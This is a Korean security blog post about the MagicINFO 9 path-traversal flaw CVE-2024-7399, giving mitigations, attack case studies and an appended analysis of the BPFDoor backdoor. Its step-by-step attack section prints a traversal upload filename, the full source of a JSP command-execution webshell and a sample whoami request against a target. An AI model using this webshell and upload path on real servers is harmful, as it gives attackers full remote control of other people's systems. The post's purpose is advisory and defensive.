삼성전자의 디지털 사이니지 관리 솔루션인 MagicINFO 9에서 발견된 심각한 보안 취약점 CVE-2024-7399이 최근 실제 공격에 악용되고 있습니다. 이 취약점은 인증 없이 원격에서 악성 코드를 실행할 수 있게 해주며, 이를 통해 공격자는 시스템 권한으로 서버를 완전히 장악할 수 있습니다.


🔍 취약점 개요: CVE-2024-7399

  • 취약점 유형: 경로 탐색(Path Traversal) 및 위험한 파일 업로드
  • 영향받는 버전: MagicINFO 9 Server 21.1050 미만 버전
  • 공격 방식:
    • 공격자는 인증 없이 JSP(JavaServer Pages) 파일을 서버에 업로드할 수 있습니다.
    • 업로드된 JSP 파일을 통해 임의의 명령어를 실행하여 서버를 제어할 수 있습니다.
  • 공개 및 패치: 삼성전자는 2024년 8월 해당 취약점을 공개하고, 버전 21.1050에서 이를 수정했습니다.

🚨 최근 공격 동향

  • PoC 공개와 공격 증가: 2025년 4월 30일, 보안 연구 그룹 SSD-Disclosure가 PoC(개념 증명) 코드를 공개한 이후, 실제 공격 사례가 급증했습니다.
  • Mirai 봇넷 악용: 일부 공격자는 이 취약점을 이용해 Mirai 봇넷 변종을 배포하고 있습니다. 이를 통해 감염된 시스템을 DDoS 공격 등에 활용하고 있습니다.
  • 공격 대상: 공항, 병원, 소매점 등에서 사용되는 디지털 사이니지 시스템이 주요 공격 대상입니다.

✅ 대응 방안

  1. 즉시 업데이트: MagicINFO 9 Server를 버전 21.1050 이상으로 업그레이드하여 취약점을 패치하십시오 .
  2. 인터넷 노출 제한: MagicINFO 서버가 외부에 노출되지 않도록 방화벽 설정을 강화하고, 필요 시 VPN 등을 통해 접근을 제한하십시오.
  3. 보안 모니터링 강화: 서버 로그를 정기적으로 확인하고, 의심스러운 JSP 파일 업로드나 비정상적인 명령 실행 흔적이 있는지 점검하십시오.
  4. 네트워크 분리: 디지털 사이니지 시스템과 내부 네트워크를 분리하여, 공격자가 내부 시스템으로 이동하는 것을 방지하십시오.

📌 참고 사항

  • 현재 약 5,000여 개의 MagicINFO 서버가 인터넷에 노출되어 있는 것으로 파악됩니다.
  • 삼성전자는 해당 취약점에 대한 보안 공지를 공식 웹사이트에 게시하고 있습니다.

🔧 공격 개요

이 취약점은 경로 탐색(Path Traversal)파일 업로드 검증 미비를 조합하여, 인증 없이 악성 JSP 웹쉘을 업로드하고 실행할 수 있게 해줍니다. 공격자는 이를 통해 원격 코드 실행(RCE) 을 달성할 수 있습니다.


🧨 공격 흐름 (Step-by-Step)

  1. 취약한 업로드 엔드포인트 식별
    • MagicINFO에는 인증 없이 접근 가능한 업로드 API가 존재합니다.
    • /MagicInfo/uploadify.do 또는 이와 유사한 엔드포인트에서 파일 업로드를 시도합니다.
  2. 파일명에 경로 조작 삽입
    • 파일명을 다음과 같이 조작합니다:
    • bash
      ../../../webapps/MagicInfo/jspShell.jsp
    • 이는 경로 탐색(../)을 통해, 업로드된 파일이 JSP 웹 루트 하위에 저장되도록 유도합니다.
  3. JSP 웹쉘 파일 업로드
    • 예시 파일 (jspShell.jsp):
    • jsp
      <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); InputStream in = p.getInputStream(); int a = -1; while((a=in.read())!=-1){ out.print((char)a); } %>
    • 위 코드는 ?cmd=ls 형태로 요청 시 시스템 명령어 실행 결과를 반환합니다.
  4. 웹쉘 실행
    • 업로드한 JSP 파일을 브라우저에서 직접 호출하여 명령어를 실행합니다:
    • bash
      http://[TARGET]/MagicInfo/jspShell.jsp?cmd=whoami

🛡️ 왜 위험한가?

  • 인증 없이 누구나 악성코드 업로드 가능
  • 서버 루트 경로에 쓰기 가능 → 완전한 제어
  • PoC 코드가 이미 공개되어 있어 실제 공격에 쉽게 악용됨
  • 공공기관, 소매점, 병원 등에서 널리 사용되는 시스템이므로 파급력

🧨 실제 악용 사례: 2025년 4월 ~ 5월

1. 📺 디지털 사이니지 디플레이 해킹 사례 (미국 내 소매점)

  • 공격 개요: 미국의 한 대형 리테일 체인점에서 MagicINFO 9 서버를 통한 RCE가 발생.
  • 공격 방식: 위에서 설명한 JSP 웹쉘 업로드 → 원격 명령어 실행 → 디지털 화면 장악.
  • 결과:
    • 매장 내 대형 스크린 수십 대가 공격자에 의해 제어됨.
    • 디지털 광고판에 공격자가 설정한 정치적 메시지, 음란 이미지 등이 노출됨.
  • 영향: 브랜드 이미지 실추, 약 6시간 가동 중지, 보안장비 교체 및 내부망 재설정 비용 발생.

2. 🌐 Mirai 변종 봇넷 감염

  • 공격자 그룹: 보안 분석에 따르면 중국발 IP를 기반으로 한 자동화된 봇넷이 MagicINFO 취약점을 통해 감염 시도.
  • 공격 목적: 서버에 접근해 Mirai 계열 악성코드를 설치하고, 디지털 사이니지를 DDoS 봇으로 활용.
  • 특이사항:
    • 일반적인 IoT 디바이스가 아닌 디지털 광고용 장비가 봇넷에 포함됨.
    • 사이니지 장비에 ssh/telnet이 비활성화되어 있어 웹 취약점을 통한 우회공격이 핵심.

3. 🏥 병원 안내 디스플레이 시스템 마비

  • 공격 위치: 유럽 내 한 대학병원
  • 피해 경로: 병원 내 MagicINFO 9 서버가 인터넷에 직접 노출 → 공격자 접근
  • 피해 결과:
    • 병원 로비 및 주요 진료과 앞 전광판에 정보 미표출 → 환자 안내 혼선
    • 관리 계정 탈취 후 전 시스템 비밀번호 변경 시도됨

🔐 공격자 공통 전략

Shodan, ZoomEye 등으로 노출 서버 스캔
/uploadify.do 등 경로로 파일 업로드
경로 조작 + JSP 쉘 설치
명령 실행 → 추가 페이로드 설치
Mirai 포함 봇넷 통신 연결
 

📌 대응 핵심 요약

  • 서버가 외부 노출돼 있다면 즉시 차단
  • 버전 확인 → 21.1050 이상 업데이트
  • 웹 루트에 JSP 파일 업로드 흔적 조사
  • URL 접근 로그에서 jsp?cmd= 요청 여부 확인

https://www.boannews.com/media/view.asp?idx=137143

'정보보안 > 취약점' 카테고리의 다른 글

🧬 BPF도어(BPFDoor) 악성코드 특성 분석  (0) 2025.04.29

1. 기본 정보

항목 내용
발견 시기 최초 발견: 2017년경 (5년 이상 은폐)
재조명: 2021년 PwC 연구진 분석
대상 시스템 리눅스, 솔라리스 계열 운영체제
주요 특징 - 스텔스형(backdoor stealth)
- 커널 레벨에서 동작
- 포트 오픈 없이 명령 수신
- 트래픽 흔적 없이 C2 서버 통신 가능
공격자 연계 일부 변종은 중국 APT 그룹과 연관성 제기됨

2. 기술적 특징 요약

기능 설명
포트 바인딩 회피 일반적인 백도어처럼 오픈 포트를 열지 않음
패킷 필터링 활용 리눅스 BPF(Berkeley Packet Filter)를 악용해 네트워크 트래픽을 감시
특정 패턴 패킷 수신 공격자가 특정 "마법 패턴" 패킷을 보내면 백도어가 명령 수신을 시작
C2 연결 은폐 정상 트래픽으로 위장하거나 ICMP 등 비표준 경로 사용
루트킷형 은폐 일부 변종은 프로세스 목록에서도 존재 자체를 숨김

🔥 요약: "아무것도 열려 있지 않은 것처럼 보이지만, 내부는 뚫려 있다."
전통적인 방화벽, IDS, 포트 스캐닝으로는 탐지 거의 불가.


3. 국내 통신망 위협 전망

항목 예상 위협
국내 통신사 리눅스 서버 취약점 BPF도어는 특정 애플리케이션 취약점이 아닌, 시스템 기반 취약성 악용 → 통신사, IDC, 클라우드 운영 리눅스 서버 대량 노출 가능성
APT 공격 경로 다양화 공격자들은 직접적 침투가 아니라 BPF도어를 통한 은폐·장기 침투형 전략을 계속 강화할 것
해외 C2 서버 이용 증가 위협 그룹은 국내망 탐지 피하기 위해 중국, 홍콩, 러시아 IP 활용하여 통신 흐름 위장 예상
2차 피해 우려 단순 유심 정보 유출을 넘어서, IP, 계정, 이메일, 인증서 등 추가 자산 유출 가능성 존재
공공기관 확산 리스크 통신 인프라 외에도 공공기관, 금융권, 에너지망까지 공격 확산 가능성 → "국가 기반시설 리스크"로 확대 우려

🛡️ 향후 필요한 대응 전략

대응 방향 설명
리눅스 커널 보안 강화 BPF 필터링 권한 통제, 커널 업데이트 주기 단축
서버 계정 보안 강화 루트 계정 사용 최소화, 다중 인증(MFA) 도입
네트워크 거버넌스 강화 비인가 트래픽 탐지 강화 (ex. 스니핑 패턴 감시)
포렌식 기반 점검 체계 구축 탐지 불가한 은닉형 백도어에 대비해 정기 포렌식 진단 필수
위협 인텔리전스 강화 해외 C2 서버 관련 IP, 도메인 위협정보 지속 수집·차단